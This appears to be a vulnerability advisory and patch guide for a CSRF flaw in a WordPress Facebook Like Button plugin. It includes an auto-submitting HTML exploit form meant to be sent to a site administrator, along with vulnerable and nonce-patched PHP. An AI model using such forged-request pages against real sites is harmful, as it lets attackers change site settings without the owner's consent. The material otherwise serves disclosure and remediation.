CVE-2012-10012 - Cross-Site Request Forgery in BestWebSoft Facebook Like Button Plugin (<= 2.13) – Exploit & Patch Guide

---

Introduction

A significant vulnerability, CVE-2012-10012, was discovered in the BestWebSoft Facebook Like Button WordPress plugin, affecting all versions up to 2.13. This flaw has been identified as a Cross-Site Request Forgery (CSRF) issue within the fcbk_bttn_plgn_settings_page function, located in facebook-button-plugin.php. In this exclusive long-read, we'll break down what the vulnerability is, how it can be exploited, show you some code, and walk through how to fix it.

What is Cross-Site Request Forgery (CSRF)?

CSRF is an attack where a malicious website, email, or program makes a user’s browser perform unwanted actions on a trusted site for which the user is currently authenticated. In the case of the BestWebSoft Facebook Like Button plugin, a CSRF flaw means that an attacker could trick an administrator into performing actions on the settings page without their knowledge.

How Does the Vulnerability Work?

The main issue lies in the lack of a security token (WordPress nonce) validation when processing changes on the plugin's settings page. This means anyone can forge a request to change plugin settings if they can get an authenticated admin to visit a specially crafted URL or website.

Exploit Details

An attacker creates a malicious form that sends a POST request to the plugin’s settings endpoint. If they can convince a logged-in WordPress administrator to submit the form (even without them knowing, say via a hidden iframe or automatic script), the attacker could change plugin settings.

Example Exploit

<!-- Save this as exploit.html and send it to a site admin -->
<html>
  <body>
    <form action="http://targetsite.com/wp-admin/options-general.php?page=facebook-button-plugin.php"; method="POST" id="csrf_form">
      <input type="hidden" name="fcbk_some_setting" value="malicious_value" />
      <input type="hidden" name="save_settings" value="1" />
    </form>
    <script>
      document.getElementById('csrf_form').submit();
    </script>
  </body>
</html>

When an admin visits this exploit.html page while logged into WordPress, their settings are modified without their consent.

How was it Fixed?

To prevent CSRF, plugins should use WordPress nonces (wp_nonce_field and check_admin_referer) to verify that requests come from legitimate sources.

- Patch commit: 33144ae5a45ed07efe7fceca901d91365fdbf7cb

Before the Patch

// settings processing (vulnerable - missing nonce check)
if (isset($_POST['save_settings'])) {
    update_option('fcbk_bttn_option', $_POST['fcbk_bttn_option']);
}

After the Patch

// settings processing (fixed - includes nonce check)
if (isset($_POST['save_settings']) && check_admin_referer('fcbk_bttn_save_settings')) {
    update_option('fcbk_bttn_option', $_POST['fcbk_bttn_option']);
}

And in the settings form

<form method="post">
    <?php wp_nonce_field('fcbk_bttn_save_settings'); ?>
    <!-- Settings fields -->
</form>

This patch ensures only requests coming from the legitimate admin interface are accepted.

References

- GitHub Patch Commit
- Vulnerability Database (VDB-225355)
- BestWebSoft Plugin Page
- WordPress Nonces Documentation

Conclusion

CVE-2012-10012 is a classic case of why it's crucial to validate requests in WordPress plugins with nonces to block attackers from tricking admins into making unauthorized changes. If you run BestWebSoft Facebook Like Button plugin, update now to stay safe!

If you found this post helpful, consider sharing it with your WordPress community to keep others secure as well. 🚨

Timeline

Published on: 04/10/2023 00:15:00 UTC
Last modified on: 04/13/2023 19:49:00 UTC